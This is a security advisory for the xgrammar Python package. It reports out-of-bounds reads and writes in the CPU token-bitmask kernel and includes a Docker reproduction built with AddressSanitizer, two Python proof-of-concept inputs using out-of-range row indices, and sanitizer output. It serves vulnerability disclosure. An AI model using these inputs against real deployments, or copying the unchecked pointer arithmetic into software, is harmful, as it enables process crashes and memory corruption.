All advisories

Out-of-Bounds Access Through CPU Mask Row Indices

mlc-ai/xgrammar / GHSA-f974-xg5h-f2pc

Affected packages

xgrammar pip
Affected versions>= 0.1.7
Patched versionsNot specified

Description

Out-of-Bounds Access Through CPU Mask Row Indices

Affected repository: mlc-ai/xgrammar
Observed HEAD: f07ca3cb03affaca98809c4e9dad41deed2f7730

Summary

The CPU implementation of apply_token_bitmask_inplace trusts every caller-provided row index. On the assessed XGrammar main revision f07ca3c, whose package metadata is 0.2.5, indices=[-1] makes the native kernel read immediately before the bitmask allocation. A second case with one logits row, two bitmask rows, and indices=[1] reads a valid caller-selected mask row but writes immediately after the logits allocation. AddressSanitizer reproduced both the out-of-bounds read and the out-of-bounds write.

The public Python API normally receives these values from its embedding application, so this report does not establish a network attack by itself. A caller that lets untrusted batch-selection data reach indices can expose native process crashes and memory corruption. The same missing validation is present in the float32, float16, and bfloat16 CPU paths.

The negative-index condition dates to the indexed CPU implementation released in v0.1.7: its original upper-bound check did not reject negative values. v0.1.14 removed that remaining upper-bound check while adding support for unequal logits and bitmask batch sizes, making positive indices outside either tensor reachable as well. I verified the vulnerable logic in v0.1.7, v0.1.14, v0.2.0, v0.2.5, v0.2.6rc2, and the assessed revision. No fixed release was present in the inspected history.

Detail

The documented contract permits unequal batch sizes only when every selected row exists in both tensors. The Python entry point in python/xgrammar/matcher.py::apply_token_bitmask_inplace does not validate that condition. Its CPU adapter in python/xgrammar/kernels/apply_token_bitmask_inplace_cpu.py converts a tensor or list of indices to a Python list and forwards it through TVM FFI together with the two shapes and strides. This is the untrusted source for the native row calculations when an embedding application exposes batch selection to its users.

cpp/grammar_matcher.cc::ApplyTokenBitmaskInplaceCPU derives logits_shape and bitmask_shape, but the only batch check is inside if (!indices.has_value()). Consequently, supplying any indices value bypasses the equality check without replacing it with per-index bounds validation. The function then dispatches the still-untrusted vector to either ApplyMask32Bits or ApplyMask16Bits.

In the float32 path, ApplyMask32Bits uses each signed idx in two independent pointer calculations:

for (auto idx : indices.value()) {
  uint32_t* data_ptr = reinterpret_cast<uint32_t*>(bitmask.data) + idx * bitmask_stride0;
  DynamicBitset bitset(vocab_size, data_ptr);
  auto logits_ptr = reinterpret_cast<float*>(logits->data) + idx * logits_stride0;
  for (int i = bitset.FindFirstZero(); i != -1; i = bitset.FindNextZero(i)) {
    logits_ptr[i] = -std::numeric_limits<float>::infinity();
  }
}

There is no intervening guard between the FFI-supplied index and either memory access. With one row in each tensor and idx == -1, both pointers are moved backward by one row. DynamicBitset::FindFirstZero dereferences the invalid bitmask pointer first, which explains the reproduced four-byte read immediately before the one-word bitmask allocation.

The unequal-batch feature makes the write primitive independently observable. With logits shaped (1, 4), bitmask shaped (2, 1), and idx == 1, data_ptr selects the valid second bitmask row. Setting that row to zero makes FindFirstZero return token positions 0 through 3, but logits_ptr points one full row past the only logits row. AddressSanitizer therefore reports a four-byte write in ApplyMask32Bits. Reversing the batch sizes instead permits an in-range logits row to be paired with an out-of-range bitmask read.

ApplyMask16Bits repeats the same row arithmetic with a uint16_t* logits pointer, so selecting 16-bit logits changes the write width but not the missing control. The no-indices branch is not a counterexample: it checks equal batch counts and generates idx only in [0, batch_size). Device, dtype, vocabulary-width, and dimensionality checks also do not constrain row indices. The root cause is therefore a validation gap at the shared CPU dispatch boundary, before both element-width kernels consume the vector.

Reproduce

Fresh validation at current default-branch commit f07ca3cb03affaca98809c4e9dad41deed2f7730 reached the reported sink under AddressSanitizer.

The following disposable Docker command checks out the assessed revision, pins the FFI dependency used for this validation, builds the native extension with AddressSanitizer, and runs the negative-index case. It intentionally aborts the final Python process and does not modify the host checkout.

docker run --rm -i python:3.12-slim-bookworm bash <<'DOCKER'
set -eux
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++
python -m pip install -q --index-url https://download.pytorch.org/whl/cpu torch
python -m pip install -q scikit-build-core apache-tvm-ffi==0.1.10 pydantic transformers numpy typing-extensions
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git rev-parse HEAD
git submodule update --init --recursive --quiet
ASAN_OPTIONS=verify_asan_link_order=0:detect_leaks=0 \
CXXFLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
LDFLAGS='-fno-lto -fsanitize=address' \
  python -m pip install -q --config-settings=cmake.build-type=Debug --no-build-isolation --no-deps .
cat > repro.py <<'PY'
import torch
import xgrammar as xgr

logits = torch.zeros((1, 4), dtype=torch.float32)
bitmask = torch.zeros((1, 1), dtype=torch.int32)
xgr.apply_token_bitmask_inplace(
    logits, bitmask, vocab_size=4, indices=[-1], backend="cpu"
)
PY
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0:symbolize=1:disable_coredump=1 \
LD_PRELOAD="$(g++ -print-file-name=libasan.so)" \
python repro.py
DOCKER

I observed the following relevant output. Repository checkout prefixes and unrelated Python frames are omitted; the source-relative locations and allocation offsets are unchanged.

ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 4
    #0 in xgrammar::DynamicBitset::DoFindZeroFrom(int) const cpp/support/dynamic_bitset.h:323
    #1 in xgrammar::DynamicBitset::FindFirstZero() const cpp/support/dynamic_bitset.h:178
    #2 in xgrammar::ApplyMask32Bits(...) cpp/grammar_matcher.cc:235
    #3 in xgrammar::ApplyTokenBitmaskInplaceCPU(...) cpp/grammar_matcher.cc:351

0x6090000001bc is located 4 bytes to the left of 4-byte region
SUMMARY: AddressSanitizer: heap-buffer-overflow cpp/support/dynamic_bitset.h:323

For the write variant, change the two tensor constructions and the index in repro.py to the following. In a separate run I observed WRITE of size 4 at cpp/grammar_matcher.cc:236, immediately after the 16-byte logits allocation.

logits = torch.zeros((1, 4), dtype=torch.float32)
bitmask = torch.zeros((2, 1), dtype=torch.int32)
xgr.apply_token_bitmask_inplace(
    logits, bitmask, vocab_size=4, indices=[1], backend="cpu"
)

Credit

Zheng Yu @ Depthfirst